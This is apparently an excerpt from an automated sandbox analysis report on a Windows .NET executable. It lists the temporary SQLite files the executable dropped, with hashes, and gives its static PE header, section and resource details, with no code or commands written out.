                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):139264
                                                                                                                                    Entropy (8bit):1.1366509594298093
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:192:+lsfoVZkNi61n1ulH5eJpX6Nq4wOVuaaDPqfPk:+lsfoQx1n1ulH5683wOVuaaDPqfM
                                                                                                                                    MD5:C5CFBCA422AD1353E7116A02424C59FD
                                                                                                                                    SHA1:38F032839FC5E1F890FAA636390A3CC9556AD350
                                                                                                                                    SHA-256:F0BFA28378F9311F7EED68314B9476296522994570F3C7B4567AB71857CAC546
                                                                                                                                    SHA-512:94463562E57B9D42995A55C24E403E6DA2EFD56C0C8EB0DAAF9C5D6D2BC85981717A2D89E92E8F492A409F1BFE1406BA5F1B559AC3457CB4353D227D1954C84B
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:SQLite format 3......@ .......D...........J......................................................zp...........<........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                    C:\Users\user\AppData\Local\Temp\tmpA4FF.tmp

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Users\user\Desktop\PalEak0Yh6.exe
                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3046000, page size 2048, file counter 6, database pages 68, cookie 0x4a, schema 4, UTF-8, version-valid-for 6
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):139264
                                                                                                                                    Entropy (8bit):1.1366509594298093
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:192:+lsfoVZkNi61n1ulH5eJpX6Nq4wOVuaaDPqfPk:+lsfoQx1n1ulH5683wOVuaaDPqfM
                                                                                                                                    MD5:C5CFBCA422AD1353E7116A02424C59FD
                                                                                                                                    SHA1:38F032839FC5E1F890FAA636390A3CC9556AD350
                                                                                                                                    SHA-256:F0BFA28378F9311F7EED68314B9476296522994570F3C7B4567AB71857CAC546
                                                                                                                                    SHA-512:94463562E57B9D42995A55C24E403E6DA2EFD56C0C8EB0DAAF9C5D6D2BC85981717A2D89E92E8F492A409F1BFE1406BA5F1B559AC3457CB4353D227D1954C84B
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:SQLite format 3......@ .......D...........J......................................................zp...........<........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                    C:\Users\user\AppData\Local\Temp\tmpA510.tmp

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Users\user\Desktop\PalEak0Yh6.exe
                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3046000, page size 2048, file counter 6, database pages 68, cookie 0x4a, schema 4, UTF-8, version-valid-for 6
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):139264
                                                                                                                                    Entropy (8bit):1.1366509594298093
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:192:+lsfoVZkNi61n1ulH5eJpX6Nq4wOVuaaDPqfPk:+lsfoQx1n1ulH5683wOVuaaDPqfM
                                                                                                                                    MD5:C5CFBCA422AD1353E7116A02424C59FD
                                                                                                                                    SHA1:38F032839FC5E1F890FAA636390A3CC9556AD350
                                                                                                                                    SHA-256:F0BFA28378F9311F7EED68314B9476296522994570F3C7B4567AB71857CAC546
                                                                                                                                    SHA-512:94463562E57B9D42995A55C24E403E6DA2EFD56C0C8EB0DAAF9C5D6D2BC85981717A2D89E92E8F492A409F1BFE1406BA5F1B559AC3457CB4353D227D1954C84B
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:SQLite format 3......@ .......D...........J......................................................zp...........<........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                    C:\Users\user\AppData\Local\Temp\tmpA520.tmp

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Users\user\Desktop\PalEak0Yh6.exe
                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3046000, page size 2048, file counter 6, database pages 68, cookie 0x4a, schema 4, UTF-8, version-valid-for 6
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):139264
                                                                                                                                    Entropy (8bit):1.1366509594298093
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:192:+lsfoVZkNi61n1ulH5eJpX6Nq4wOVuaaDPqfPk:+lsfoQx1n1ulH5683wOVuaaDPqfM
                                                                                                                                    MD5:C5CFBCA422AD1353E7116A02424C59FD
                                                                                                                                    SHA1:38F032839FC5E1F890FAA636390A3CC9556AD350
                                                                                                                                    SHA-256:F0BFA28378F9311F7EED68314B9476296522994570F3C7B4567AB71857CAC546
                                                                                                                                    SHA-512:94463562E57B9D42995A55C24E403E6DA2EFD56C0C8EB0DAAF9C5D6D2BC85981717A2D89E92E8F492A409F1BFE1406BA5F1B559AC3457CB4353D227D1954C84B
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:SQLite format 3......@ .......D...........J......................................................zp...........<........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                    C:\Users\user\AppData\Local\Temp\tmpA521.tmp

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Users\user\Desktop\PalEak0Yh6.exe
                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3046000, page size 2048, file counter 6, database pages 68, cookie 0x4a, schema 4, UTF-8, version-valid-for 6
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):139264
                                                                                                                                    Entropy (8bit):1.1366509594298093
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:192:+lsfoVZkNi61n1ulH5eJpX6Nq4wOVuaaDPqfPk:+lsfoQx1n1ulH5683wOVuaaDPqfM
                                                                                                                                    MD5:C5CFBCA422AD1353E7116A02424C59FD
                                                                                                                                    SHA1:38F032839FC5E1F890FAA636390A3CC9556AD350
                                                                                                                                    SHA-256:F0BFA28378F9311F7EED68314B9476296522994570F3C7B4567AB71857CAC546
                                                                                                                                    SHA-512:94463562E57B9D42995A55C24E403E6DA2EFD56C0C8EB0DAAF9C5D6D2BC85981717A2D89E92E8F492A409F1BFE1406BA5F1B559AC3457CB4353D227D1954C84B
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:SQLite format 3......@ .......D...........J......................................................zp...........<........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                    C:\Users\user\AppData\Local\Temp\tmpDC4F.tmp

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Users\user\Desktop\PalEak0Yh6.exe
                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3046000, page size 2048, file counter 6, database pages 68, cookie 0x4a, schema 4, UTF-8, version-valid-for 6
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):139264
                                                                                                                                    Entropy (8bit):1.1366509594298093
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:192:+lsfoVZkNi61n1ulH5eJpX6Nq4wOVuaaDPqfPk:+lsfoQx1n1ulH5683wOVuaaDPqfM
                                                                                                                                    MD5:C5CFBCA422AD1353E7116A02424C59FD
                                                                                                                                    SHA1:38F032839FC5E1F890FAA636390A3CC9556AD350
                                                                                                                                    SHA-256:F0BFA28378F9311F7EED68314B9476296522994570F3C7B4567AB71857CAC546
                                                                                                                                    SHA-512:94463562E57B9D42995A55C24E403E6DA2EFD56C0C8EB0DAAF9C5D6D2BC85981717A2D89E92E8F492A409F1BFE1406BA5F1B559AC3457CB4353D227D1954C84B
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:SQLite format 3......@ .......D...........J......................................................zp...........<........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                    C:\Users\user\AppData\Local\Temp\tmpDC60.tmp

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Users\user\Desktop\PalEak0Yh6.exe
                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):49152
                                                                                                                                    Entropy (8bit):0.8180424350137764
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                    MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                    SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                    SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                    SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                    C:\Users\user\AppData\Local\Temp\tmpDC71.tmp

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Users\user\Desktop\PalEak0Yh6.exe
                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):49152
                                                                                                                                    Entropy (8bit):0.8180424350137764
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                    MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                    SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                    SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                    SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                    C:\Users\user\AppData\Local\Temp\tmpDC72.tmp

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Users\user\Desktop\PalEak0Yh6.exe
                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):49152
                                                                                                                                    Entropy (8bit):0.8180424350137764
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                    MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                    SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                    SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                    SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                    C:\Users\user\AppData\Local\Temp\tmpDC82.tmp

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Users\user\Desktop\PalEak0Yh6.exe
                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):49152
                                                                                                                                    Entropy (8bit):0.8180424350137764
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                    MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                    SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                    SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                    SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                    C:\Users\user\AppData\Local\Temp\tmpDC83.tmp

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Users\user\Desktop\PalEak0Yh6.exe
                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):49152
                                                                                                                                    Entropy (8bit):0.8180424350137764
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                    MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                    SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                    SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                    SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                    C:\Users\user\AppData\Local\Temp\tmpDC94.tmp

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Users\user\Desktop\PalEak0Yh6.exe
                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):49152
                                                                                                                                    Entropy (8bit):0.8180424350137764
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                    MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                    SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                    SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                    SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                    C:\Users\user\AppData\Local\Temp\tmpDC95.tmp

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Users\user\Desktop\PalEak0Yh6.exe
                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):114688
                                                                                                                                    Entropy (8bit):0.9746603542602881
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                    C:\Users\user\AppData\Local\Temp\tmpDCA6.tmp

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Users\user\Desktop\PalEak0Yh6.exe
                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):114688
                                                                                                                                    Entropy (8bit):0.9746603542602881
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                    C:\Users\user\AppData\Local\Temp\tmpDCB6.tmp

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Users\user\Desktop\PalEak0Yh6.exe
                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):114688
                                                                                                                                    Entropy (8bit):0.9746603542602881
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                    Static File Info

                                                                                                                                    General

                                                                                                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                    Entropy (8bit):7.5989505394560934
                                                                                                                                    TrID:
                                                                                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                                                    • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                    • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                    File name:PalEak0Yh6.exe
                                                                                                                                    File size:605'184 bytes
                                                                                                                                    MD5:c69b2b190f08dc6bb255a2c0ce1c148b
                                                                                                                                    SHA1:b3d29e545e0b3fb9e83968c3b6d0f3c7dbee67f4
                                                                                                                                    SHA256:3d6a6e8d03f0b291d9709a0d623b01f76d3f92f3fe395b6f57027cc9e892aa30
                                                                                                                                    SHA512:22b6e29ac922ee42be11fcf452611a0889380dd62503d7db144373c44b61d57c4cf738710bbb3517ac6edc8fbaebfd7031b6a57ab5eab6d2e87ddde2c8f8dc04
                                                                                                                                    SSDEEP:12288:2GpuMpm+gvyQqbxxFWBJqWjdgPwnnqoqxJ2fUkVRVRty1+ZWu:lpuLmbxKTdAQA2rlRt0u
                                                                                                                                    TLSH:5CD4EF6432A8EB07D97AA7F94931E17413F92CEE7811D2169FEA6CDB7C72F044A10253
                                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...T.u...............0.............2:... ...@....@.. ....................................@................................

                                                                                                                                    File Icon

                                                                                                                                    Icon Hash:1bb3b3b3b3d389b3

                                                                                                                                    Static PE Info

                                                                                                                                    General

                                                                                                                                    Entrypoint:0x493a32
                                                                                                                                    Entrypoint Section:.text
                                                                                                                                    Digitally signed:false
                                                                                                                                    Imagebase:0x400000
                                                                                                                                    Subsystem:windows gui
                                                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                    Time Stamp:0xE175F754 [Sat Nov 12 03:30:28 2089 UTC]
                                                                                                                                    TLS Callbacks:
                                                                                                                                    CLR (.Net) Version:
                                                                                                                                    OS Version Major:4
                                                                                                                                    OS Version Minor:0
                                                                                                                                    File Version Major:4
                                                                                                                                    File Version Minor:0
                                                                                                                                    Subsystem Version Major:4
                                                                                                                                    Subsystem Version Minor:0
                                                                                                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                                    Entrypoint Preview

                                                                                                                                    Instruction
                                                                                                                                    jmp dword ptr [00402000h]
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al
                                                                                                                                    add byte ptr [eax], al

                                                                                                                                    Data Directories

                                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x939df0x4f.text
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x940000x1b50.rsrc
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x960000xc.reloc
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x914940x70.text
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                    Sections

                                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                    .text0x20000x91a380x91c002197f4bea86d01326aef54247a193938False0.8566211942538593data7.6062064641536145IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                    .rsrc0x940000x1b500x1c00ce90278bbf33d93b8066a774c21fc66bFalse0.7731584821428571data7.225540382335109IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                    .reloc0x960000xc0x20069c37131a3aa28fea966266f42c67a86False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                    Resources

                                                                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                    RT_ICON0x941300x151aPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.8863383931877082
                                                                                                                                    RT_GROUP_ICON0x9564c0x14data0.9
                                                                                                                                    RT_VERSION0x956600x304data0.43134715025906734
                                                                                                                                    RT_MANIFEST0x959640x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                                                                                    Imports

                                                                                                                                    DLLImport
                                                                                                                                    mscoree.dll_CorExeMain

                                                                                                                                    Version Infos

                                                                                                                                    DescriptionData
                                                                                                                                    Translation0x0000 0x04b0
                                                                                                                                    Comments
                                                                                                                                    CompanyName
                                                                                                                                    FileDescriptionProject
                                                                                                                                    FileVersion1.0.0.0
                                                                                                                                    InternalNameSFXH.exe
